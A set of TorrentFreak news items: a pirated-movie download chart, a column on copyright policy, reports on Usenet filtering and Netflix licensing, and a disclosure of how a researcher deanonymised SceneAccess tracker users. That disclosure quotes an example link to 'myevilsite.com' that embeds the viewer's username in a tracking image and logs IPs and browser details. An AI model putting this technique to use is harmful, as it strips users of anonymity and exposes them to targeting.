This week we have three newcomers in our chart.

Kung Fu Panda 3 is the most downloaded movie.

The data for our weekly download chart is estimated by TorrentFreak, and is for informational and educational reference only. All the movies in the list are BD/DVDrips unless stated otherwise.

RSS feed for the weekly movie download chart.

Ranking	(last week)	Movie	IMDb Rating / Trailer
torrentfreak.com
1	(2)	Deadpool (HDTS)	8.6 / trailer
2	(1)	Kung Fu Panda 3 (Webrip)	8.0 / trailer
3	(…)	IP-Man 3	7.6 / trailer
4	(3)	The Hateful Eight	8.0 / trailer
5	(5)	The Revenant (DVDscr)	8.2 / trailer
6	(…)	The Hunger Games: Mockingjay – Part 2	6.8 / trailer
7	(…)	Point Break	5.3 / trailer
8	(4)	The Big Short	8.1 / trailer
9	(8)	Spectre	7.9 / trailer
10	(…)	Room	8.3 / trailer

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

It would appear that when a subject is sufficiently peripheral to policymakers, slow incumbent industries can get whatever repressive and counterproductive policy they want, even in the face of overwhelming public opinion to the opposite for about 40 years.

In 1968, at the height of the hippie movement when everybody and their brother were doing joints, everybody and their brother were equally convinced cannabis would be legal in just a few years. How could it not be?

Twenty years later, in 1990, the war on certain species of plants was harsher than ever before.

Around 1995, at the dawn of file-sharing with ZModem over BBS networks and early dialup, and even more so with the advent of Napster a few years later, everybody and their brother were convinced copyright monopoly laws needed to be updated to reflect reality – like you unceremoniously adjust a map to the observed factual terrain. It was deemed to be a couple of years out, five years tops.

Here we are, twenty years later, and utterly insane corporate power grabs in the name of TPP, TTIP, and TISA are being cooked, while policitians remain dangerously clueless on the matter. Meanwhile, respect for the copyright monopoly as a law is considerably lower than the respect for speed limits.

The pattern here is that while the delusion and the disconnect remains active, punishments become increasingly harsher as policymakers desperately try to align the terrain with the map in their delusional heads, kind of how a military force with a bad mapmaker need to use an ever-increasing amount of explosives to fix the terrain instead of the map.

This goes on until the system comes down, until the hypocrisy ends, until people just stop pretending.

Slow cracks in the facade start appearing before the 40 years are up and you hit some sort of tipping point: in 1992, Bill Clinton famously said that he had smoked cannabis, but defended himself saying he “didn’t inhale”, as if that somehow made it politically acceptable in the eyes of the vested interests.

In 2007, a full fifteen years later, Barack Obama said “of course I inhaled, that was the point”, and didn’t try to excuse himself in the slightest. That was forty years after 1968. (Well, 39.)

The pattern here is that the people with crazy delusions of entitlement, such as the copyright industry, simply take forty years to die, so those ideas get naturally erased from the group and the population at large. This is not a new pattern; it is present as early as the Christian/Jewish/Muslim sacred texts, when Moses led a bunch of people from Egypt to the Levant, which according to said texts took 40 years.

Now, it doesn’t take 40 years to walk from Egypt to the Levant. It takes two months to walk westward from the Levant across all of Europe, and Egypt is one-tenth that distance. The only way to make it take 40 years is to walk around in the desert at random, making 40 years of time pass.

We’ve frequently said that the current idiocy will solve itself once the people of the net generation come into the string-pulling positions of power, but that’s still some time out, and we gotta hold the barricades against dark-black dystopia until then. If we’re extrapolating 40 years from Napster, that puts us about 2040. People with the most political power are usually 50-60 years old, which means they will have been born in 1980-1990: the net arrived when they were in their late childhood to early teens. The people born in this time understand the net, and they have absolutely no sympathy whatsoever for the parasitic copyright industry swimming in its despicable and damaging delusions of entitlement.

But should we really have to wait another 25 years for the blatantly and painfully obvious to become apparent to policymakers? Can’t we use, you know, this Internet thing to make ideas move just a little faster today?

As a complete side note, another plant was banned earlier in history with the roughly same pattern and the same arguments. The plant was coffee.

About The Author

Rick Falkvinge is a regular columnist on TorrentFreak, sharing his thoughts every other week. He is the founder of the Swedish and first Pirate Party, a whisky aficionado, and a low-altitude motorcycle pilot. His blog at falkvinge.net focuses on information policy.

Book Falkvinge as speaker?

Follow @Falkvinge

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

On a very basic level torrent sites come in two flavors. On the one hand there’s public sites such as KickassTorrents and Pirate Bay, on the other there are closed communities that tend to stay out of public view.

These closed communities are known as private trackers and they’re often difficult to gain access to. This is supposed to enhance their security and in many cases indeed does but problems do exist as today’s news illustrates.

Several weeks ago TorrentFreak was contacted by a security researcher who proposed that we write an article on how law enforcement would be able to uncover crucial information about the operators, staff, uploaders and users of one of the most well-known private trackers.

Several days later our tipster, who told us he has worked in website security for many years, said that he’d managed to exploit a flaw in the tracker to extract sensitive information about its users.

“I can identify a user to an IP address. This is useful against owners/staff and uploaders. If I worked for a government organization, I could target the owner of the IP to hand over data,” he explained.

“Also I am able to gather browser (and its version) and operation system. If they are running vulnerable versions, [an attacker] could try to target them.”

At this point the security worker declined our request to identify the site since there was no simple way he could inform them of the issues without risking his membership. However, he was prepared to explain how the exploit worked.

“The website uses BBCode for forums and private messages (to bold things, insert emoji, and photos),” he explained.

“One of the BBCodes this site uses is [you]. If you place this in a forum or a private message it will insert the user’s logon name, that is viewing the page. If my username was ‘Randomusername’, and someone sent me a private message saying ‘Hello [you]!’, when I opened it, the BBcode would translate to ‘Hello Randomusername!'”

While this sounds harmless enough, there’s a real sting in the tail. According to the researcher he was able to set up a remote system on a server under his control to extract IP addresses and other information of the people who read postings formatted in this fashion.

“When you add [you] on the end of an image, you get something like this http://myevilsite.com/photo.php?u=[you].jpg. On this PHP page [on a remote site], you generate a transparent 1 pixel x 1 pixel image. But as it is PHP, you run commands to gather the IP address, gather the OS, and gather the browser and version [of the person viewing it],” he explained.

“When people viewed the page, they didn’t know that a tiny image was stealing their information.”

And it appears he did manage to extract a considerable amount of sensitive information.

“The next part was how to get the maximum amount of viewers of my transparent PHP image. So I decided to post in various forums. I also messaged staff and uploaders directly. Once these people viewed the post/message, it would load the transparent image, and I would store all of the above information, which mapped back to their username on the site,” he explained.

Weeks passed by without TF hearing anything further and without knowing the name of the site we decided to sit on the information. But then, more than a month after first contact we were contacted again, this time with information that confirmed the affected site was popular private tracker SceneAccess.

Part of the code used to extract the data

In the interests of security, TorrentFreak immediately contacted the site’s staff and informed them of the problems before anyone else could carry out the same exploit. The disclosure would also given the site the opportunity to advise its members of the flaw but at this point it’s unclear whether it has done so.

Although one can’t be sure that the exploit hadn’t already been discovered by someone else, the researcher who contacted us didn’t appear to have any malice towards the site and expressed no intention of doing anything bad with the data.

“I am into web application security and I naturally check for ways that could compromise the sites I use. I have done this for my company, my banks and even my torrent sites. I also teach a website hacking class, pretty regularly,” he explained.

However, the researcher claims that he did manage to get a lot of data which attached usernames to IP addresses, including those of staff and uploaders. It’s not clear how many had taken precautions to hide their identities on site but the researchers feels not all of them did.

“From my data not all of them are using VPNs or seed boxes,” he said.

As can be seen from the somewhat intentionally blurry, heavily redacted and incomplete screenshot below, the database compiled by the researcher is considerable and includes sensitive details of uploaders and staff members.

Some of the data extracted from the site

While the vulnerability is easily fixed, the researcher says that other private trackers using the same feature could also be prone to having data extracted in the same manner.

“Typically the [you] BBCode wouldn’t be a vulnerability on any average site. But on a private site, that does questionable things, it turns into a vulnerability. I do not know if anyone else has implemented the [you] BBCode, but I do know that it is specifically on the ‘NOT going to happen’ list on TorrentBytes,” he says.

Of course, the limited numbers of people on private trackers means that there is less chance of something like this being exploited. Also, the invite systems on private sites go some way to keeping undesirables out. However, as the researcher notes, these systems aren’t watertight.

“Members get invites that they can give or sell to other people. Even though selling is against the rules, people still do it and someone really looking to take them down, wouldn’t mind spending a couple of bucks,” he concludes.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

Hollywood-backed anti-piracy group BREIN and Usenet provider News-Service.com have been battling in court for several years already.

BREIN is looking for a ruling that makes keyword filters mandatory on Usenet, but the now defunct Usenet provider argues that this is not feasible.

A final decision in the case was delayed again this week. Before it reaches a conclusion, the Dutch court wants both sides to answer detailed questions about the efficacy and costs associated with such a filtering mechanism.

Both parties are allowed to present their own experts to testify on the matter. This could prove to be very interesting, as the Usenet provider is already receiving support from an unexpected quarter.

IP-Arrow, a copyright enforcement company that works with many rightsholders, has just published an opinion article arguing against keyword filters.

The company admits that their stance may not be a popular opinion in the industry, but as one of the outfits that specializes in Usenet, they strongly believe that keyword filters are costly and ineffective.

To understand the situation people have to understand the difference between the Usenet servers and the sites that act as indexers. On the indexing sites people search for NZB files that link to movies and music. However, the actual file-names on the Usenet servers are often quite cryptic.

While these filters may work on Usenet indexing sites, the files on the Usenet servers are often named differently and are therefore harder to filter. Instead of “JoesMovie.avi,” the file would be named “klj37jkhf812jkj11klh66690-132.avi” for example, or any other non-descriptive name.

“When we look at an indexing site for filtering, it makes sense because a user is actually looking or seeing “JoesMovie” in a list,” IP-Arrow’s Joe explains. “They are not looking for “klj37jkhf812jkj11klh66690-132” nor do they care what the actual filename is.

“They grab an NZB or torrent file and start downloading,” he adds.

As a result, using automated filters to remove content from Usenet servers is much harder than it looks. According to IP-Arrow these type of filters will therefore fail to deliver.

In theory it might be possible to arrive at a more effective solution, but that would certainly not be automated. Instead, it would require a rather expensive operation comprising of people who continuously scour Usenet for pirated content.

“This would require a massive database that would need to be updated hourly by live people for all the variations of titles. To do any filter on this scale would by an extremely expensive project on a level that we have not seen,” Joe notes.

As one of the most prominent Usenet takedown service providers, IP-Arrow of course has a stake in taking this position. That said, the company does have quite a bit of Usenet expertise on board.

The article cited above is written by Joe Morganelli, who himself operated the Usenet indexer Binnews several years ago.

Morganelli and his site were eventually targeted by the MPAA in 2006. A year later he agreed to a consent judgment which included several million dollars in damages, after he ‘switched sides’ and started a content protection outfit.

If News-Service.com continues their case against BREIN it looks like they might have found an excellent expert witness to argue their case…

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

Traditionally the movie industry has relied on geographical licensing deals through which movie and TV-show rights are sold to separate parties in various countries.

As a relative newcomer to the business, Netflix’s vision is to do things differently. The company’s aim is to make as much content available globally as it can and is developing several movies and TV-shows in-house to advance this mission.

With this in mind, one would think that geographical copyright restrictions are no longer an issue for Netflix’s own original programming, but unfortunately this is not the case.

Last week Netflix released the latest season of House of Cards, something millions of people were looking forward to. However, Netflix subscribers in dozens of countries are not able to watch it, yet, due to licensing issues.

House of Cards fans in Austria, Germany, Switzerland, Spain, Hong Kong, Turkey and most of Africa are among those missing out. They can watch the first seasons, but there’s no sign of the new episodes. Even worse, in some countries House of Cards isn’t available at all.

Needless to say, the missing House of Cards episodes are being met with a mixture of surprise and anger online.

Missing cards

TorrentFreak reached out to Netflix for an explanation and we were informed that the company doesn’t have global licences for its drama series House of Cards and Orange Is The New Black. The latter series is entirely absent from Netflix in over 50 countries.

“Most of our originals content will be available globally. However, with these two earlier shows, we didn’t negotiate global licenses to the content and so they’ve aired on other platforms in the meantime,” the company states.

“We may get them back in some of our new markets. For example, we have Orange is the New Black available in our new countries in Asia, with the title coming to the Middle East and Africa later this year,” Netflix adds.

This situation is quite painful since Netflix has repeatedly called on the movie industry to offer its content globally, without artificial barriers. Apparently, they haven’t managed to do this for all of their own content yet.

According to Netflix CEO Reed Hastings the licensing issues are a legacy from the last seven or eight years, which they hope to get rid of in the near future.

“We’re moving as quickly as we can to have global availability of all the content on Netflix so that there are not regional distinctions. We’re still somewhat a prisoner of the current distribution architecture, we’re trying really hard to get there,” he said.

In the meantime, House of Card fans who live in the wrong country must hold their breath, although many are already looking for alternative means to get what they want…

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.